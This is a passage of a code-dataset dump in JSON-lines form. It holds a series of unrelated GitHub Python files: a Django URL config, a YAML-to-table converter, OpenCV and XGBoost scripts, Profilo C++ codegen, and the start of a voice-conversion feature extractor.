1/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":16354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"36802052724","text":"\"\"\"day24_myself URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom app01 import views\n\nurlpatterns = [\n url(r'^$', views.login),\n url(r'^index/$', views.index),\n url(r'^login/$', views.login),\n url(r'^reg/$', views.reg),\n url(r'^logout_v/$', views.logout_v),\n url(r'^admin/', admin.site.urls),\n\n url(r'^hosts/$', views.hosts),\n url(r'^hosts/add/$', views.hosts_add),\n url(r'^hosts/edit/(\\d+)/$', views.edit_host),\n url(r'^hosts/del/(\\d+)/$', views.delete_host),\n\n url(r'^users/$', views.users),\n url(r'^users/add/$', views.users_add),\n url(r'^users/del/(\\d+)/$', views.users_del),\n url(r'^users/edit/(\\d+)/$', views.users_edit),\n\n url(r'^test/$', views.test),\n]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shengleqi/day24_myself","sub_path":"day24_myself/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35645939138","text":"# -*- coding: utf-8 -*-\nfrom os.path import splitext\nimport argparse\nimport yaml\nimport json\nfrom tabular.tabular import Tabular, MarkdownTabular, AsciiDocTabular\n\n\ndef set_config(args):\n tabular_cls = Tabular\n file_name = args.yml_file\n name, ext = splitext(file_name)\n out_ext = '.txt'\n if args.markdown:\n tabular_cls = MarkdownTabular\n out_ext = '.md'\n if args.asciidoc:\n tabular_cls = AsciiDocTabular\n out_ext = '.adoc'\n if args.csv:\n tabular_cls = Tabular\n out_ext = '.csv'\n\n file_parser = yaml\n if args.json or ext == 'json':\n file_parser = json\n output = args.output\n if not output:\n output = name + out_ext\n table_name = args.tablename\n if not table_name:\n table_name = name\n return file_name, file_parser, tabular_cls, output, table_name\n\n\ndef run(args):\n file_name, file_parser, tabular_cls, output, table_name = set_config(args)\n with open(file_name, 'r') as yml_file:\n data = file_parser.load(yml_file)\n t = tabular_cls.from_dict(data, table_name=table_name)\n result = t.render()\n with open(output, 'w') as out:\n out.write(result)\n print('output into {}'.format(output))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='convert yaml file into tabular text(csv, markdown, AsciiDoc)')\n parser.add_argument('yml_file', help='target yaml file to convert')\n parser.add_argument('-o', '--output',\n help='output file name. If no designation, replace file extension following table style')\n parser.add_argument('-t', '--tablename', help='set table name (default: file name base)')\n parser.add_argument('-j', '--json', action='store_true', default=0, help='json file convert mode')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-md', '--markdown', action='store_true', default=1, help='as markdown style')\n group.add_argument('-ad', '--asciidoc', action='store_true', default=0, help='as AsciiDoc style')\n group.add_argument('--csv', action='store_true', default=0, help='as csv style')\n\n run(parser.parse_args())","repo_name":"ta-dadadada/yamltotable","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4847090800","text":"import os\nfrom typing import List\n\nfrom setuptools import find_packages, setup\n\nimport versioneer\n\nPATH_ROOT = os.path.dirname(__file__)\n\n\ndef _load_requirements(path_dir: str, file_name: str) -> List[str]:\n with open(os.path.join(path_dir, file_name), \"r\") as file:\n lines = [ln.strip() for ln in file.readlines()]\n reqs = list()\n for line in lines:\n if line.startswith(\"#\"):\n continue\n else:\n reqs.append(line)\n return reqs\n\n\nsetup(\n name=\"washing-learning\",\n version=versioneer.get_version(),\n cmdclass=versioneer.get_cmdclass(),\n author=\"Lucas Robinet\",\n author_email=\"lucas.robinet@yahoo.com\",\n description=\"Machine Learning Toolbox\",\n long_description=open(\"README.md\", \"r\").read(),\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Lucas-rbnt/washing-learning\",\n license=\"Apache-2.0\",\n packages=find_packages(exclude=[\"examples\", \"examples.*\", \"tests\", \"tests.*\"]),\n install_requires=_load_requirements(\n path_dir=os.path.join(PATH_ROOT), file_name=\"requirements.txt\"\n ),\n extras_requires={\n \"dev\": _load_requirements(\n path_dir=os.path.join(PATH_ROOT), file_name=\"requirements-dev.txt\"\n ),\n \"doc\": _load_requirements(\n path_dir=os.path.join(PATH_ROOT), file_name=\"requirements-doc.txt\"\n ),\n },\n)\n","repo_name":"Lucas-rbnt/washing-learning","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17815524265","text":"import turtle\n\ndef draw_shapes():\n\n # Setting a window with the background colored red\n window = turtle.Screen()\n window.bgcolor('red')\n\n # Move a turtle named brad forward\n brad = turtle.Turtle()\n\n # Customize the turtle\n brad.shape(\"turtle\")\n brad.color('yellow')\n brad.speed(2)\n\n # Turn Brad right 90 degrees and move forward x 4\n for i in range(4):\n brad.forward(100)\n brad.right(90)\n\n # Add another turtle named angie\n angie = turtle.Turtle()\n\n # Customize angie\n angie.shape(name='arrow')\n angie.color('blue')\n\n # angie, draw a circle\n angie.circle(100)\n\n # Add the third turtle named charles\n charles = turtle.Turtle()\n\n # Customize charles\n charles.shape(name='turtle')\n charles.color('green')\n\n # charles, draw a triangle\n for i in range(3):\n charles.back(100)\n charles.right(120)\n\n window.exitonclick()\n\ndraw_shapes()\n","repo_name":"chukycheese/udacity_courses","sub_path":"programming_foundations_with_python/3_use_classes_draw_turtles/11_improving_code_quality.py","file_name":"11_improving_code_quality.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8580705846","text":"\ndef isPandigital(n):\n return set(str(n)) == set('0123456789')\n\ndef solve(n):\n count = 0\n def _solve(x, d, m):\n nonlocal count\n if m == 0:\n if isPandigital(x):\n count += 1\n else:\n if d == 0:\n _solve(10*x + 1, 1, m-1)\n elif d == 9:\n _solve(10*x + 8, 8, m-1)\n else:\n _solve(10*x + d-1, d-1, m-1)\n _solve(10*x + d+1, d+1, m-1)\n for i in range(1, 10):\n _solve(i, i, n-1)\n return count\n\nfor i in range(10, 25):\n print('i=' + str(i) + ', ' + str(solve(i)))\n \n","repo_name":"tyama711/competitive","sub_path":"ProjectEuler/Problem178/p178.py","file_name":"p178.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14817029693","text":"import cv2\nimport numpy as np\n\n\ndef nichika(img, th=128):\n ind0 = np.where(img < th)\n ind1 = np.where(img >= th)\n img[ind0] = 0\n img[ind1] = 1\n\n return img\n\ndef Renketsu(img):\n Ver, Hor = img.shape\n img = np.pad(img, ([1, 1], [1, 1]), 'edge')\n result = np.zeros((Ver+1, Hor+1, 3))\n\n for x in range(1, Hor+1):\n for y in range(1, Ver+1):\n if img[y, x] != 0:\n s1 = img[y, x+1] - (img[y, x+1] * img[y-1, x+1] * img[y-1, x])\n s2 = img[y-1, x] - (img[y-1, x] * img[y-1, x-1] * img[y, x-1])\n s3 = img[y, x-1] - (img[y, x-1] * img[y+1, x-1] * img[y+1, x])\n s4 = img[y+1, x] - (img[y+1, x] * img[y+1, x+1] * img[y, x+1])\n S = s1 + s2 + s3 + s4\n\n if S == 0:\n result[y,x] = [0, 0, 255]\n elif S == 1:\n result[y,x] = [0, 255, 0]\n elif S == 2:\n result[y,x] = [255, 0, 0]\n elif S == 3:\n result[y,x] = [255, 255, 0]\n elif S == 4:\n result[y,x] = [255, 0, 255]\n\n return result[1:1+Ver, 1:1+Hor]\n\n\nimg = cv2.imread(\"../renketsu.png\", cv2.IMREAD_GRAYSCALE)\nimg = nichika(img, 1)\nresult = Renketsu(img)\n\ncv2.imwrite(\"myans_61.png\", result)\ncv2.imshow(\"result\", result)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n","repo_name":"OverHall27/Gasyori100knock","sub_path":"Question_61_70/myanswers/myans61.py","file_name":"myans61.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28143295175","text":"from xgboost import XGBClassifier\nimport pandas as pd\nfrom sklearn.grid_search import GridSearchCV\nimport time\n\nt_start = time.time()\n\nX_train = pd.read_csv(\"X_train.csv\").drop(columns=[\"Unnamed: 0\",\"index\"], axis=1)\ny_train = pd.read_csv(\"y_train.csv\").drop(columns=[\"Unnamed: 0\",\"id\"], axis=1).target.values\n\n\nparameters = {'min_child_weight': [5, 10],\n 'gamma': [0.01, .1,1],\n 'subsample': [0.8,1],\n 'colsample_bytree': [0.6, 0.8],\n 'max_depth': [3, 5, 7]\n }\n\nparameters = {'learning_rate':[0.02],\n 'min_child_weight': [5],\n 'gamma': [30],\n 'subsample': [0.6],\n 'colsample_bytree': [0.6],\n 'max_depth': [6],\n 'n_estimators':[1000]\n }\n\n\n\nxgbc = XGBClassifier(objective='binary:logistic',\n silent=True, verbose=True, scale_pos_weight=8)# 'scale_pos_weight' to set as the ratio for skewed data\n\nclf_xgbc=GridSearchCV(estimator=xgbc,param_grid=parameters, scoring='roc_auc', cv=3, n_jobs=1,verbose=100)\n\nclf_xgbc.fit(X_train, y_train)\n\n\nprint(\"Best parameters are {}\".format(clf_xgbc.best_params_))\nprint(\"Best score is {}\".format(clf_xgbc.best_score_))\n\n\nt_end = time.time()\nprint(\"It took {} seconds to run this test\".format(t_end-t_start))","repo_name":"amnghd/Uber_Driver_Prediction_Challenge","sub_path":"utility functions/xgboost_hypertunner.py","file_name":"xgboost_hypertunner.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"5838842647","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.load(\"Geometry.MuonCommonData.muonIdealGeometryXML_cfi\")\nprocess.load(\"Geometry.RPCGeometry.rpcGeometry_cfi\")\nprocess.load(\"Geometry.MuonNumbering.muonNumberingInitialization_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n 'file:/tmp/carrillo/kktau300GeVx1000WithRPC.root'\n )\n)\n\nprocess.demo = cms.EDAnalyzer('TrackRPC',\n tracks = cms.untracked.string('standAloneMuons'),\n partLabel = cms.untracked.string(\"genParticles\"),\n rootFileName = cms.untracked.string('/tmp/carrillo/hscp.root'),\n\n)\n\n\nprocess.p = cms.Path(process.demo)\n","repo_name":"camilocarrillo/UserCode","sub_path":"TrackRPC/trackrpc_cfg.py","file_name":"trackrpc_cfg.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19819878240","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nfrom ..codegen import Codegen, SIGNED_SOURCE\nfrom ..types import DynamicArrayType\nfrom .type_converter import TypeConverter\n\n\nclass CppEntryStructsCodegen(Codegen):\n def __init__(self, entries):\n super(CppEntryStructsCodegen, self).__init__()\n\n # Keep only one example of each unique typename\n self.unique_types = {x.memory_format.typename: x.memory_format for x in entries}\n\n def preferred_filename(self):\n return \"Entry.h\"\n\n def generate(self):\n template = \"\"\"\n// %%SIGNED_SOURCE%%\n\n#include \n#include \n#include \n#include \n#include \n\n#pragma once\n\nnamespace facebook {\nnamespace profilo {\nnamespace entries {\n\n%%ENTRIES_STRUCTS%%\n\nuint8_t peek_type(const void* src, size_t len);\n\n} // namespace entries\n} // namespace profilo\n} // namespace facebook\n\"\"\".lstrip()\n\n enum = self._generate_entries_structs()\n template = template.replace(\"%%ENTRIES_STRUCTS%%\", enum)\n template = template.replace(\"%%SIGNED_SOURCE%%\", SIGNED_SOURCE)\n return template\n\n def _generate_entries_structs(self):\n\n structs = [\n self._generate_entry_struct(fmt) for fmt in list(self.unique_types.values())\n ]\n\n structs = \"\\n\".join(structs)\n\n return structs\n\n def _generate_entry_struct(self, fmt):\n template = \"\"\"\nstruct __attribute__((packed)) %%TYPENAME%% {\n\n static const uint8_t kSerializationType = %%TYPE_ID%%;\n\n%%FIELDS%%\n\n static void pack(const %%TYPENAME%%& entry, void* dst, size_t size);\n static void unpack(%%TYPENAME%%& entry, const void* src, size_t size);\n\n static size_t calculateSize(%%TYPENAME%% const& entry);\n};\n\"\"\".lstrip()\n\n fields = [\n TypeConverter.get(field[1]).generate_declaration(name=field[0])\n for field in fmt.fields\n ]\n fields = \"\\n\".join(fields)\n fields = Codegen.indent(fields)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%TYPE_ID%%\", str(fmt.type_id))\n template = template.replace(\"%%FIELDS%%\", fields)\n\n return template\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n\n\nclass CppEntryStructsCppCodegen(Codegen):\n def __init__(self, entries):\n super(CppEntryStructsCppCodegen, self).__init__()\n\n # Keep only one example of each unique typename\n self.unique_types = {x.memory_format.typename: x.memory_format for x in entries}\n\n def preferred_filename(self):\n return \"Entry.cpp\"\n\n def generate(self):\n template = \"\"\"\n// %%SIGNED_SOURCE%%\n\n#include \n#include \n#include \n\nnamespace facebook {\nnamespace profilo {\nnamespace entries {\n\n%%ENTRIES_CODE%%\n\nuint8_t peek_type(const void* src, size_t len) {\n const uint8_t* src_byte = reinterpret_cast(src);\n return *src_byte;\n}\n\n} // namespace entries\n} // namespace profilo\n} // namespace facebook\n\"\"\".lstrip()\n\n code = self._generate_entries_code()\n template = template.replace(\"%%ENTRIES_CODE%%\", code)\n template = template.replace(\"%%SIGNED_SOURCE%%\", SIGNED_SOURCE)\n return template\n\n def _generate_entries_code(self):\n\n structs = [\n self._generate_entry_struct(fmt) for fmt in list(self.unique_types.values())\n ]\n\n structs = \"\\n\".join(structs)\n\n return structs\n\n def _generate_entry_struct(self, fmt):\n template = \"\"\"\n%%PACKCODE%%\n\n%%UNPACKCODE%%\n\n%%CALCULATESIZECODE%%\n\"\"\".lstrip()\n\n pack_code = self._generate_pack_code(fmt)\n unpack_code = self._generate_unpack_code(fmt)\n calcsize_code = self._generate_calcsize_code(fmt)\n\n template = template.replace(\"%%PACKCODE%%\", pack_code)\n template = template.replace(\"%%UNPACKCODE%%\", unpack_code)\n template = template.replace(\"%%CALCULATESIZECODE%%\", calcsize_code)\n\n return template\n\n def _generate_pack_code(self, fmt):\n template = \"\"\"\n/* Alignment requirement: dst must be 4-byte aligned. */\nvoid %%TYPENAME%%::pack(const %%TYPENAME%%& entry, void* dst, size_t size) {\n if (size < %%TYPENAME%%::calculateSize(entry)) {\n throw std::out_of_range(\"Cannot fit %%TYPENAME%% in destination\");\n }\n if (dst == nullptr) {\n throw std::invalid_argument(\"dst == nullptr\");\n }\n uint8_t* dst_byte = reinterpret_cast(dst);\n *dst_byte = kSerializationType;\n size_t offset = 1;\n\n%%MEMCOPIES%%\n}\n\"\"\".lstrip()\n\n memcopies = []\n for idx, (name, ftype) in enumerate(fmt.fields):\n\n if isinstance(ftype, DynamicArrayType) and idx != len(fmt.fields) - 1:\n # HACK: figure out how to propagate dynamic offsets in the\n # packing/unpacking code\n raise ValueError(\n \"DynamicArrayType entries are only allowed\" \" as the last member\"\n )\n\n memcpy = TypeConverter.get(ftype).generate_pack_code(\n from_expression=\"entry.{name}\".format(name=name),\n to_expression=\"dst_byte\",\n offset_expr=\"offset\",\n )\n memcopies.append(memcpy)\n memcopies = \"\\n\".join(memcopies)\n memcopies = Codegen.indent(memcopies)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%MEMCOPIES%%\", memcopies)\n return template\n\n def _generate_unpack_code(self, fmt):\n template = \"\"\"\n/* Alignment requirement: src must be 4-byte aligned. */\nvoid %%TYPENAME%%::unpack(%%TYPENAME%%& entry, const void* src, size_t size) {\n if (src == nullptr) {\n throw std::invalid_argument(\"src == nullptr\");\n }\n const uint8_t* src_byte = reinterpret_cast(src);\n if (*src_byte != kSerializationType) {\n throw std::invalid_argument(\"Serialization type is incorrect\");\n }\n size_t offset = 1;\n%%MEMCOPIES%%\n}\n\"\"\".lstrip()\n\n memcopies = []\n for name, ftype in fmt.fields:\n memcpy = TypeConverter.get(ftype).generate_unpack_code(\n from_expression=\"src_byte\",\n to_expression=\"entry.{name}\".format(name=name),\n offset_expr=\"offset\",\n )\n memcopies.append(memcpy)\n memcopies = \"\\n\".join(memcopies)\n\n memcopies = Codegen.indent(memcopies)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%MEMCOPIES%%\", memcopies)\n return template\n\n def _generate_calcsize_code(self, fmt):\n template = \"\"\"\nsize_t %%TYPENAME%%::calculateSize(%%TYPENAME%% const& entry) {\n size_t offset = 1 /*serialization format*/;\n%%EXPRESSIONS%%\n return offset;\n}\n\"\"\".lstrip()\n\n expressions = [\n TypeConverter.get(ftype).generate_runtime_size_code(\n \"entry\",\n fname,\n \"offset\",\n )\n for fname, ftype in fmt.fields\n ]\n expressions = \"\\n\".join(expressions)\n expressions = Codegen.indent(expressions)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%EXPRESSIONS%%\", expressions)\n return template\n","repo_name":"facebookarchive/profilo","sub_path":"cpp/codegen/cpp/entry_structs.py","file_name":"entry_structs.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","stars":1576,"dataset":"github-code","pt":"53"}
+{"seq_id":"23079345856","text":"import pymysql\nfrom datetime import datetime\nfrom collections import defaultdict\n\nsql_dict = {\n 'host': '10.10.180.145',\n 'user': 'hourong',\n 'password': 'hourong',\n 'charset': 'utf8',\n 'db': 'IP'\n}\n\ncount_dict = defaultdict(list)\nint_split = 30\nif __name__ == '__main__':\n _count = 0\n conn = pymysql.connect(**sql_dict)\n with conn as cursor:\n # IP\n # cursor.execute('''SELECT\n # ip_address,\n # group_concat(u_time ORDER by u_time)\n # FROM ip_used\n # GROUP BY ip_address''')\n # local proxy\n cursor.execute('''SELECT\n local_proxy,\n group_concat(u_time ORDER by u_time)\n FROM ip_used\n GROUP BY local_proxy''')\n for line in cursor.fetchall():\n _count += 1\n if _count % 10000 == 0:\n print(_count)\n ip, times = line\n time_list = times.decode().split(',')\n if len(time_list) == 1:\n count_dict[-1].append(ip)\n\n else:\n for i in range(len(time_list) - 1):\n try:\n last = datetime.strptime(time_list[i + 1], '%Y-%m-%d %X')\n first = datetime.strptime(time_list[i], '%Y-%m-%d %X')\n except Exception:\n continue\n\n res = (last - first).seconds // 60\n\n count_dict[res // int_split].append(ip)\n\n # print(count_dict)\n x_data = []\n y_data = []\n for k in sorted(count_dict.keys()):\n v = count_dict[k]\n if k == -1:\n print('1 times', len(v))\n x_data.append('一次')\n y_data.append(len(v))\n else:\n print(str(30 * k) + ' - ' + str(30 + 30 * k), len(v))\n x_data.append(str(30 * k) + ' - ' + str(30 + 30 * k))\n y_data.append(len(v))\n conn.close()\n print(x_data)\n print(y_data)\n","repo_name":"20113261/p_m","sub_path":"IP_report/ip_report.py","file_name":"ip_report.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4237528731","text":"#################### Select news sources #################### \nimport pandas as pd \nimport numpy as np\nimport os\n\ndata_preparation_path = os.path.join(os.path.dirname(os.path.abspath(__file__)))\nos.chdir(data_preparation_path)\n\nlabels = pd.read_csv('labels.csv')\n\nlabels.rename(columns={'Unnamed: 0': 'Source'}, inplace=True)\n\n# Removing German articles of Spiegel\nlabels.drop(index=np.array(labels.index)[labels['Source']=='Spiegel'], inplace=True)\nlabels.reset_index(drop=True, inplace=True)\n\n\nunwanted_columns = ['NewsGuard, Does not repeatedly publish false content',\n 'NewsGuard, Gathers and presents information responsibly',\n 'NewsGuard, Regularly corrects or clarifies errors',\n 'NewsGuard, Handles the difference between news and opinion responsibly',\n 'NewsGuard, Avoids deceptive headlines',\n 'NewsGuard, Website discloses ownership and financing',\n 'NewsGuard, Clearly labels advertising',\n \"NewsGuard, Reveals who's in charge, including any possible conflicts of interest\",\n 'NewsGuard, Provides information about content creators',\n 'NewsGuard, score',\n 'NewsGuard, overall_class',\n 'Pew Research Center, known_by_40%',\n 'Pew Research Center, total',\n 'Pew Research Center, consistently_liberal',\n 'Pew Research Center, mostly_liberal',\n 'Pew Research Center, mixed',\n 'Pew Research Center, mostly conservative',\n 'Pew Research Center, consistently conservative',\n 'Wikipedia, is_fake',\n 'Open Sources, reliable',\n 'Open Sources, fake',\n 'Open Sources, unreliable',\n 'Open Sources, bias',\n 'Open Sources, conspiracy',\n 'Open Sources, hate',\n 'Open Sources, junksci',\n 'Open Sources, rumor',\n 'Open Sources, blog',\n 'Open Sources, clickbait',\n 'Open Sources, political',\n 'Open Sources, satire',\n 'Open Sources, state',\n 'PolitiFact, Pants on Fire!',\n 'PolitiFact, False',\n 'PolitiFact, Mostly False',\n 'PolitiFact, Half-True',\n 'PolitiFact, Mostly True',\n 'PolitiFact, True']\n# 'BuzzFeed, leaning'\nlabels_wanted = labels.drop(unwanted_columns, axis=1)\n\n# buzzfeed news source count\nnum_buzzfeed_outlets = np.invert(pd.isna(labels_wanted['BuzzFeed, leaning'])).sum()\n\n##### Allsides Dataset (chosen) ###############################################\n\n# labeled lean left\nallsides_lean_left = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Lean Left'])\n# labeled lean right\nallsides_lean_right = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Lean Right'])\n# labeled: center\nallsides_center = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Center'])\n# labeled: right\nallsides_right = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Right'])\n# labeled: left\nallsides_left = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Left'])\n\nallsides_sources = allsides_center + allsides_lean_left + allsides_lean_right \\\n + allsides_left + allsides_right\nallsides_bias_labels = len(allsides_center) * ['Center'] \\\n + len(allsides_lean_left) * ['Lean Left'] \\\n + len(allsides_lean_right) * ['Lean Right'] \\\n + len(allsides_left) * ['Left'] \\\n + len(allsides_right) * ['Right']\n\n\nnum_allsides_outlets = len(allsides_bias_labels)\n\n# saving to csv\nallsides_sources_with_labels = pd.DataFrame({'Source': allsides_sources,\n 'bias':allsides_bias_labels})\n\nallsides_sources_with_labels.to_csv(os.path.join('allsides_data', 'allsides_bias_labels.csv'), index=False)\n\n\n##### MediaBias/FactCheck dataset (disregarded) ###################################\n\n# labeled: least biased\nmbfc_least_biased = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='least_biased'])\n# labeled: left bias\nmbfc_left_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='left_bias'])\n# labeled: right bias\nmbfc_right_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='right_bias'])\n# labeled: left center bias\nmbfc_left_center_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='left_center_bias'])\n# labeled: right center bias\nmbfc_right_center_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='right_center_bias'])\n# variable: extreme left\nmbfc_extreme_left = list(labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n [labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n ['Media Bias / Fact Check, extreme_left']==1]['Source'])\n# variable: extreme right\nmbfc_extreme_right = list(labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n [labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n ['Media Bias / Fact Check, extreme_right']==1]['Source'])\n\nmbfc_sources = mbfc_least_biased + mbfc_left_bias + mbfc_right_bias \\\n + mbfc_left_center_bias + mbfc_right_center_bias \\\n + mbfc_extreme_left + mbfc_extreme_right\n\nmbfc_bias_labels = len(mbfc_least_biased) * ['least_biased'] \\\n + len(mbfc_left_bias) * ['left_bias'] \\\n + len(mbfc_right_bias) * ['right_bias'] \\\n + len(mbfc_left_center_bias) * ['left_center_bias'] \\\n + len(mbfc_right_center_bias) * ['right_center_bias'] \\\n + len(mbfc_extreme_left) * ['extreme_left'] \\\n + len(mbfc_extreme_right) * ['extreme_right'] \n\nnum_mbfc_outlets = len(mbfc_bias_labels)\n\nmbfc_sources_with_labels = pd.DataFrame({'Source': mbfc_sources,\n 'bias':mbfc_bias_labels})\n# saving to csv\nmbfc_sources_with_labels.to_csv('mbfc_full/mbfc_full_for_counting_bias_labels.csv', index=False)\n\n\n##### SQL commands ################################################################\n#############################################\nsql_sources = allsides_sources # mbfc_sources\n#############################################\nsql_string = 'DELETE FROM articles WHERE '\nfor i,source in enumerate(mbfc_sources):\n if i != len(mbfc_sources) -1:\n sql_string +='NOT source=' + \"'\" + source + \"'\"+ ' AND '\n else: \n sql_string +='NOT source=' + \"'\" + source + \"'\"\n\nprint(sql_string)\n","repo_name":"Tobias-K93/media-bias-prediction","sub_path":"data_preparation/0_select_news_sources.py","file_name":"0_select_news_sources.py","file_ext":"py","file_size_in_byte":6649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27696098817","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Created on 9:21 AM 11/30/18\n @author: ngunhuconchocon\n @brief: This script is made to construct frame-wise dictionary between src and tar spectra\n For short, it create dicts of exemplars ( a_i, b_i pairs)\n\"\"\"\n\nfrom __future__ import print_function\nfrom tqdm import tqdm\n\nfrom utils import config_get_config, logdir, io_read_speaker_data, io_save_to_disk\n\nimport pickle\nimport configparser\n\nimport os\nimport pdb\n\nimport librosa as lbr\nimport pysptk\nfrom dtw import dtw\nfrom fastdtw import fastdtw\n# from dtaidistance.dtw import distance_fast, best_path, best_path2, warping_paths\nfrom librosa import display\n\nimport pyworld as pw\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# for debugging\nimport logging\nimport cProfile\nimport datetime\nimport itertools\nimport time\n\nfrom multiprocessing import Pool, cpu_count\n\n\nlogging.basicConfig(\n filename=\"logs/\" + \":\".join(str(datetime.datetime.now()).split(\":\")[:-1]),\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s %(module)s - %(funcName)s: %(message)s',\n datefmt=\"%Y-%m-%d %H:%M:%S\"\n)\n\ntry:\n import coloredlogs\n coloredlogs.install(level=logging.DEBUG, fmt='%(asctime)s %(levelname)s %(module)s - %(funcName)s: %(message)s')\nexcept ModuleNotFoundError:\n pass\n\n# parse the configuration\nargs = config_get_config(\"config/config\")\n\nframe_length = int(args['feat_frame_length'])\noverlap = float(args['feat_overlap'])\n# hop_length = int(frame_length * overlap) + 300\nhop_length = int(args['feat_hop_length'])\norder = int(args['feat_order'])\nalpha = float(args['feat_alpha'])\ngamma = float(args['feat_gamma'])\n\ndata_path = args['DataPath']\nspeakerA = args['SpeakerA']\nspeakerB = args['SpeakerB']\nfeature_path = args['feature_path']\nsr = int(args['sampling_rate'])\n\nf0_floor = int(args['f0_floor'])\n\ncpu_rate = float(args['cpu_rate'])\nnb_file = int(args['nb_file'])\n\n# frame_length = pw.get_cheaptrick_fft_size(sr, f0_floor)\n# frame_length = pw.get_cheaptrick_fft_size(sr, f0_floor)\n\nlogging.info(\"{}% cpu resources ({} cores) will be used to run this script\".format(cpu_rate * 100, int(cpu_rate * cpu_count())))\nlogging.info(\"START EXTRACTING ...\")\n\n\n# This is wrong (as we need MCEP, not MFCC). Nevertheless, preserving this is necessary.\n# Updated 2018 Dec 14: Edit feat_mfccs to extract_features, with multiple choice of choosing feature to extract. Default is mcep\n# TODO feat argument need to be implement as a list, support multiple feature-type return\ndef _extract_features(audiodatum, speaker, sr=16000, feat='mcep'):\n \"\"\"\n Note: this is file-based implementation for multiprocessing. Different from non-parallel version\n Feature extraction. For each type of feature, see corresponding case below\n Currently support: MCEP, MFCC. Will be updated when needed\n :param audiodatum: 162 files time-series data\n :param sr: sampling rate.\n :param feat: type of currently supported feature\n :return:\n \"\"\"\n if feat.lower() == 'mfcc':\n \"\"\"\n extract mfcc from audio time series data (from librosa.load)\n \"\"\"\n # mfcc = lbr.util.normalize(lbr.feature.mfcc(audiodatum, sr=sr, n_fft=frame_length, hop_length=hop_length), norm=1, axis=0)\n mfcc = lbr.feature.mfcc(audiodatum, sr=sr, n_fft=frame_length, hop_length=hop_length)\n\n # return np.stack(mfccs)\n return mfcc\n\n elif feat.lower() == 'mcep' or feat.lower() == 'mcc':\n \"\"\" \n MCEP is extracted via pysptk. See the link below for more details\n https://github.com/eYSIP-2017/eYSIP-2017_Speech_Spoofing_and_Verification/wiki/Feature-Extraction-for-Speech-Spoofing\n \n Example of using 